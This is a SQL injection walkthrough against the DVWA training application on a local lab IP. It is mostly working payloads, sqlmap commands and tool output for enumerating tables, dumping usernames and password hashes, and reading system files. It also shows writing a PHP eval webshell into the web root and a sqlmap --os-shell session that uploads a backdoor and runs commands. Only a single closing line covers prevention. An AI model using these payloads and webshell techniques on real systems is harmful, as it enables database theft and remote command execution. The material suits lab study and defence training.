Splicing SQL commands to query data
Comments commonly used in SQL injection:
  #      single-line comment (note: URL-encode it as %23 when it goes in a query string)
  --     two minus signs followed by a space (URL-encoded as --+), single-line comment
  /* */  block comment
Note: when the application escapes (translates) the single quote, hex-encode string literals so the payload needs no quotes at all.
Injection test PoCs:
  1 or 1=1
  1' or '1=1
  1" or "1=1
(The '1=1 form works because MySQL casts the string '1=1' to the number 1 in a boolean context; 1' or '1'='1 is the portable spelling.)
SQL injection usage (union-based "echo" injection)
Find the number of columns in the query: xx' order by N--+ and bisect on N; the largest N that does not error is the column count.
Determine the echo points (which columns are displayed): xx' union select 1,2--+
  http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=xx'+union+select+1,2--+&Submit=Submit#
Database version and data directory: xx' union select @@version,@@datadir--+
  http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=xx'+union+select+@@version,@@datadir--+&Submit=Submit#
Current database user and database name: select user(), database();
python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" --current-user --current-db
Table names: select table_name from information_schema.tables where table_schema='dvwa';
  http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=xx'+union+select+1,table_name+from+information_schema.tables+where+table_schema='dvwa'--+&Submit=Submit#
python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa --tables
Column names: select column_name from information_schema.columns where table_name='users';
  http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=xx'+union+select+1,column_name+from+information_schema.columns+where+table_name='users'--+&Submit=Submit#
python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa -T users --columns
User names and passwords: select user,password from users;
  http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=xx'+union+select+user,password+from+users--+&Submit=Submit#
python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa -T users -C "user,password" --dump

Read a file: select load_file('c:\\windows\\win.ini');
Write a one-line webshell: select "<?php @eval($_GET['cmd']); ?>" into outfile 'c:\\phpstudy\\www\\dvwa\\ttt.php';
(Both need the FILE privilege for the MySQL user; into outfile also needs a writable web root and a secure_file_priv setting that does not restrict the path.)

OS shell through the same injection point (sqlmap uploads a file stager and a backdoor into the web root):
python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa -T users -C "user,password" --os-shell
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.4.16#dev}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:42:39

[09:42:39] [INFO] resuming back-end DBMS 'mysql'
[09:42:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1' OR NOT 1977=1977#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 3539 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3539=3539,1))),0x7178767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fxcd&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5)-- peqj&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x716a767171,0x50557565536267736d786d6466746d634a4d6b46466d61764e46484d635941774f6a725371596862,0x7178767171)#&Submit=Submit
---
[09:42:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:42:39] [INFO] going to use a web backdoor for command prompt
[09:42:39] [INFO] fingerprinting the back-end DBMS operating system
[09:42:39] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[09:42:43] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: c:\phpstudy\www\dvwa
[09:42:51] [WARNING] unable to automatically parse any web server path
[09:42:51] [INFO] trying to upload the file stager on 'c:/phpstudy/www/dvwa/' via LIMIT 'LINES TERMINATED BY' method
[09:42:51] [INFO] heuristics detected web page charset 'ascii'
[09:42:51] [INFO] the file stager has been successfully uploaded on 'c:/phpstudy/www/dvwa/' - http://192.168.3.88:80/dvwa/tmpummkl.php
[09:42:52] [INFO] the backdoor has been successfully uploaded on 'c:/phpstudy/www/dvwa/' - http://192.168.3.88:80/dvwa/tmpbhbmv.php
[09:42:52] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> dir
do you want to retrieve the command standard output? [Y/n/a] y
[09:42:56] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---
 Volume in drive C is BOOTCAMP
 Volume Serial Number is D89B-813F

 Directory of C:\phpstudy\WWW\dvwa

2017-05-16  09:42    <DIR>          .
2017-05-16  09:42    <DIR>          ..
2015-10-05  15:51               500 .htaccess
2015-10-05  15:51             3,845 about.php
2015-10-05  15:51             7,229 changelog.md
2017-04-25  09:18    <DIR>          config
2015-10-05  15:51            33,107 copying.txt
2017-04-25  09:18    <DIR>          docs
2017-04-25  09:18    <DIR>          dvwa
2017-04-25  09:18    <DIR>          external
2015-10-05  15:51             1,406 favicon.ico
2017-04-25  09:18    <DIR>          hackable
2015-10-05  15:51               895 ids_log.php
2015-10-05  15:51             4,389 index.php
2015-10-05  15:51             1,869 instructions.php
2015-10-05  15:51             3,522 login.php
2015-10-05  15:51               414 logout.php
2015-10-05  15:51               148 php.ini
2015-10-05  15:51               199 phpinfo.php
2015-10-05  15:51             7,651 readme.md
2015-10-05  15:51                   robots.txt
2015-10-05  15:51             4,686 security.php
2015-10-05  15:51             2,364 setup.php
2017-05-04  20:59               466 test.php
2017-05-16  09:42               908 tmpbhbmv.php
2017-05-16  09:42               727 tmpummkl.php
2017-05-15  21:11                   ttt.php
2017-04-25  09:18    <DIR>          vulnerabilities
              20 File(s)         74,380 bytes
               8 Dir(s)  18,391,883,776 bytes free
---
os-shell> x
[09:43:02] [INFO] cleaning up the web files uploaded
[09:43:02] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[09:43:02] [INFO] fetched data logged to text files under 'C:\Users\zptxwd\.sqlmap\output\192.168.3.88'

[*] shutting down at 09:43:03
sqlmap automatic injection against the DVWA levels

DVWA's normal business logic: look up a record by user ID and echo it back to the page:
  select first_name, surname from XXX where user_id='<id>'

Low
Manual check: 1' or '1=1 returns every row, which confirms the injection. Then:
  python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=1r06imrpmtlhgg7magi3oos273;security=low"

Medium
The form becomes a POST and single quotes are escaped, so quoted payloads break. Capture the request and change the POST parameter to a payload that needs no quotes (id=1 or 1=1); where a string literal is unavoidable, hex-encode it (table_name=0x7573657273 instead of table_name='users').
  python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=medium"
  python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=medium" -D dvwa -T users -C "user,password" --dump

High
The query input is taken on one page and the result is echoed on another (the id is submitted on session-input.php, stored in the session, and used by sqli/), so this is a second-order injection: point -u at the page that accepts the input and --second-order at the page that shows the result:
  python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/session-input.php" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=dv9h9urfu9bf9udkd7ih6qdbj3;security=high" --second-order "http://192.168.3.88/dvwa/vulnerabilities/sqli/"

Preventing SQL injection: check that id has the expected data type (an integer); use prepared statements and bind id as a variable; use stored procedures.
SQL echo injection notes